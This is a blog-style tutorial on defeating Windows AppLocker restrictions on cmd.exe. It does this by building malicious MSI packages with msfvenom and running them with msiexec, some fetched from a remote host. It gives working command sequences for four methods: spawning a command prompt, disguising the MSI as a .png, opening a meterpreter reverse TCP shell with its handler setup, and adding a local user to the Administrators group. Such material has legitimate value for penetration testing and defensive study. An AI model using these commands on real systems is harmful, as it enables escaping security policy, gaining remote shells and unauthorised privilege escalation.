In our privious article,
we had discussed on “Windows
Applocker Policy – A Beginner’s Guide” as they defines the AppLocker
rules for your application control policies and how to work with them. But
Today you will learn how to bypass Applocker policies. In this post, we
have block cmd.exe file using Windows applocker Policy and try to bypass this restriction
to get command prompt as administrator.
Table of Content
Associated file
formats where Applocker is applicable
Challenge 1: - Bypass Applocker with .msi file to get
CMD as Administrator
Little-Bit more
about MSI file
Multiple Methods
to get CMD as Administrator
·
Generate malicious .msi file with Msfvenom -1st
Method
·
Generate malicious .msi file with Msfvenom -2nd
Method
·
Generate malicious .msi file with Msfvenom -3rd
Method
Challenge 2: - Make a local user member of
Administrative Group
·
Generate
Malicious .msi file with Msfvenom -4th
Method
Associated file formats where Applocker is Applicable
Windows applocker is a
function that was introduced in home windows 7 and windows server 2008 r2 as a
method to restrict the usage of unwanted Programs. In this an administrator can
restict the execution of the following
programs:
It depends entirely on the system admin which program or
script he wants to set the applocker policy for program restriction or
execution. There could a situation where Command
Prompt (cmd.exe), or Pwershell or
dll file or batch file or rundll32.exe
or regsrv.32 or regasm and many more are blocked.
Challenge 1: - Bypass Applocker with .msi file
to get CMD as Administrator
Let’s suppose you are in a similar situation where all
the above mentioned application is blocked and only Windows Installer file i.e.
the.msi extension is allowed to run
without any restrictions.
Then how will you use an msi file to bypass these restriction and get a
full privilege shell?
Little-Bit more
about MSI file
The MSI name comes from the original title of the program, Microsoft Installer. Since then the
name has changed to Windows Installer.
An .MSI file extension file is a Windows Package Installer. An installation
package contains all the information required to install or uninstall an
application by Windows Installer.Each installation package contains a .msi file, which contains an
installation database, a summary information stream and data streams for
different parts of the installation.
The Windows Installer
technology is divided into two parts that work in combination; these include a
client-side installer service (Msiexec.exe) and a Microsoft Software Installation
(MSI) package file. Windows Installer uses information contained in a package
file to install the program.
The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.
When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.
Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.
The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.
When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.
Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.
Multiple Methods to get CMD as
Administrator
Generate Malicious .msi file with Msfvenom -1st Method
Now let’s open a new terminal in Kali machine and generate a
malicious MSI Package file as cmd.msi to get command prompt through it by utilizing
the Windows/exec payload as follows:
msfvenom -p
Windows/exec CMD=cmd.exe -f msi > cmd.msi
python -m
HTTPServer 80
Now transfer cmd.msi file in your Windows machine to
obtain the command prompt shell as administrators. Here we have used Python HTTP server for
sharing file in the network.
Once you have downloaded the.msi file on your local machine
(Windows OS where cmd.exe is blocked by admin), you can use the following
syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax:
misexec /quiet /i
msiexec /quiet /i
C:\Users\raj\Desktop\cmd.msi
As soon as you will hit the above mentioned command inside
run prompt, you will get the Command Prompt as administrator.
Generate Malicious .msi file with Msfvenom -2nd Method
Note: Even if you rename
cmd.msi file in another extension, it will bypass the rule and start a command
prompt as an administrator.
Repeat above to generate an msi file with the same payload
as msfvenom and named cmd.png. Since I already have a cmd.msi file in my kali,
I rename it as cmd.png and use a python server to transfer it.
Once you have downloaded the cmd.png file (which is actually
an .msi file) on your local machine (Windows OS where cmd.exe is blocked by
admin), you can use the following syntax to run the.msi file with msiexec.exe
inside the run prompt.
Syntax:
misexec /q /i
msiexec /q /i
http://192.168.1.107/cmd.png
As soon as you will hit the above mentioned command inside
run prompt, you will get the Command Prompt as administrator.
Generate Malicious .msi file with Msfvenom -3rd Method
In above methods, we obtain a command prompt by utilizing
the Windows/exec payload but now we will use windows/meterpreter/reverse_tcp
payload to get full privilege command shell via meterpreter sessions.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 –f msi
> shell.msi
Now again transfer shell.msi file in your Windows machine
to obtain the command prompt shell as administrators and start multi/handler. Here we
have used Python HTTP server for sharing file in the network.
Once you have downloaded the shell.msi file on your local
machine (Windows OS where cmd.exe is blocked by admin), you can use the
following syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax:
misexec /q /i
msiexec /q /i
http://192.168.1.107/shell.msi
As soon as you will hit the above mentioned command inside run
prompt, you will get the Command Prompt as administrator via the meterpreter
session using this exploit!!
msf > use
exploit/multi/handler
msf
exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf
exploit(handler) > set lhost 192.168.1.107
msf
exploit(handler) > set lport 1234
msf
exploit(handler) > exploit
meterpreter > shell
Challenge 2: - Make a local user member of
Administrators Group
Let’s suppose you are in a similar situation where all
the above mentioned application is blocked and only Windows Installer file i.e.
the.msi extension is allowed to run
without any restrictions.
Then how will you use an msi file to bypass
these restriction to make a local user member of Administrators Group where
cmd.exe is block?
Note: Here aaru is
a local user account which is not non-administrative user account as shown
below:
As we know that due to applocker execution rule policy,
cmd.exe is block on the local machine, therefore we cannot use command prompt
to add aaru in the administrator group.
Generate Malicious .msi file with Msfvenom -4th Method
Generate a MSI package as admin.msi with the windows/exec
payload that sends a command instructing to add local admin privileges for the
user “aaru”, to the target machine.
msfvenom -p
windows/exec CMD='net localgroup administrators aaru /add' -f msi >
admin.msi
Now transfer admin.msi file in your Windows machine to add
aaru in the administrators group. Here
we have used Python HTTP server for sharing file in the network.
Once you have downloaded the admin.msi file your local
machine (Windows OS where cmd.exe is blocked by admin), you can use the
following syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax:
misexec /q /i
msiexec /q /i
http://192.168.1.107/admin.msi
As soon as you will hit the above mentioned command inside
run prompt, you can ensure that the aaru user has become part of administrators
account.
Hopefully, it becomes clear to you, that, how you can use an
.msi file to compromise an operating system where cmd.exe and other
applications are blocked by administrator.
References:
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
0 comments:
Post a Comment